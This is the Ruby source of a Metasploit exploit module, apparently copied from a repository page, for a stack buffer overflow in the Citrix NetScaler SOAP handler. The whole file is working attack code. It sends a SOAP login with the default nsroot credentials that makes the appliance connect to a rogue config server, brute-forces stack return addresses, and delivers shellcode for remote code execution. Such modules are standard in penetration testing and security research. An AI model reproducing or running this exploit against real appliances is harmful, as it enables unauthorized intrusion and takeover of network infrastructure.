Path: blob/master/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb
19515 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::Remote::TcpServer10include Msf::Exploit::Brute1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Citrix NetScaler SOAP Handler Remote Code Execution',17'Description' => %q{18This module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance.19The vulnerability exists in the SOAP handler, accessible through the web interface. A20malicious SOAP requests can force the handler to connect to a malicious NetScaler config21server. This malicious config server can send a specially crafted response in order to22trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary23code with the privileges of the web server running the SOAP handler. This module has been24tested successfully on the NetScaler Virtual Appliance 450010.25},26'License' => MSF_LICENSE,27'Author' => [28'Bradley Austin', # Vulnerability Discovery and PoC29'juan vazquez' # Metasploit module30],31'References' => [32['URL', 'http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html']33],34'Payload' => {35'Space' => 1024,36'MinNops' => 512,37'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -350038},39'Arch' => ARCH_X86,40'Platform' => 'bsd',41'Stance' => Msf::Exploit::Stance::Aggressive,42'Targets' => [43[44'NetScaler Virtual Appliance 450010',45{46'RwPtr' => 0x80b9000, # apache2 rw address / Since this target is a virtual appliance, has sense.47'Offset' => 606,48'Ret' => 0xffffda94, # Try before bruteforce...49# The virtual appliance lacks of security mitigations like DEP/ASLR, since the50# process being exploited is an apache child, the bruteforce attack works fine51# here.52'Bruteforce' =>53{54'Start' => { 'Ret' => 0xffffec00 }, # bottom of the stack55'Stop' => { 'Ret' => 0xfffdf000 }, # top of the stack56'Step' => 25657}58}59],60],61'DisclosureDate' => '2014-09-22',62'DefaultTarget' => 0,63'Notes' => {64'Stability' => [ CRASH_SAFE, ],65'Reliability' => [ REPEATABLE_SESSION, ],66'SideEffects' => [ IOC_IN_LOGS, ]67}68)69)7071register_options(72[73OptString.new('TARGETURI', [true, 'The base path to the soap handler', '/soap']),74OptAddress.new('SRVHOST', [true, 'The local host to listen on. This must be an address on the local machine reachable by the target', ]),75OptPort.new('SRVPORT', [true, 'The local port to listen on.', 3010])76]77)78end7980def check81res = send_request_cgi({82'method' => 'GET',83'uri' => normalize_uri(target_uri.path)84})8586if res && res.code == 200 && res.body && res.body =~ /Server Request Handler.*No body received/m87return Exploit::CheckCode::Detected88end8990Exploit::CheckCode::Unknown91end9293def exploit94if ['0.0.0.0', '127.0.0.1'].include?(datastore['SRVHOST'])95fail_with(Failure::BadConfig, 'Bad SRVHOST, use an address on the local machine reachable by the target')96end9798if check != Exploit::CheckCode::Detected99fail_with(Failure::NoTarget, "#{peer} - SOAP endpoint not found")100end101102start_service103104if target.ret105@curr_ret = target.ret106send_request_soap107Rex.sleep(3)108109if session_created?110return111end112end113114super115end116117def brute_exploit(addrs)118@curr_ret = addrs['Ret']119send_request_soap120end121122def send_request_soap123soap = <<~EOS124<?xml version="1.0" encoding="ISO-8859-1"?><SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">125<SOAP-ENV:Body>126<ns7744:login xmlns:ns7744="urn:NSConfig">127<username xsi:type="xsd:string">nsroot</username>128<password xsi:type="xsd:string">nsroot</password>129<clientip xsi:type="xsd:string">#{datastore['SRVHOST']}</clientip>130<cookieTimeout xsi:type="xsd:int">1800</cookieTimeout>131<ns xsi:type="xsd:string">#{datastore['SRVHOST']}</ns>132</ns7744:login>133</SOAP-ENV:Body>134</SOAP-ENV:Envelope>135EOS136137print_status('Sending soap request...')138139send_request_cgi({140'method' => 'POST',141'uri' => normalize_uri(target_uri.path),142'data' => soap143}, 1)144end145146def on_client_data(cli)147print_status("#{cli.peerhost} - Getting request...")148149data = cli.get_once(2)150req_length = data.unpack('v')[0]151152req_data = cli.get_once(req_length - 2)153unless req_data.unpack('V')[0] == 0xa5a50000154print_error("#{cli.peerhost} - Incorrect request... sending payload anyway")155end156157print_status("#{cli.peerhost} - Sending #{payload.encoded.length} bytes payload with ret 0x#{@curr_ret.to_s(16)}...")158159my_payload = Rex::Text.pattern_create(target['Offset'])160my_payload << [@curr_ret, target['RwPtr']].pack('V*')161my_payload << payload.encoded162163pkt = [my_payload.length + 6].pack('v')164pkt << "\x00\x00\xa5\xa5"165pkt << my_payload166cli.put(pkt)167cli.disconnect168end169end170171172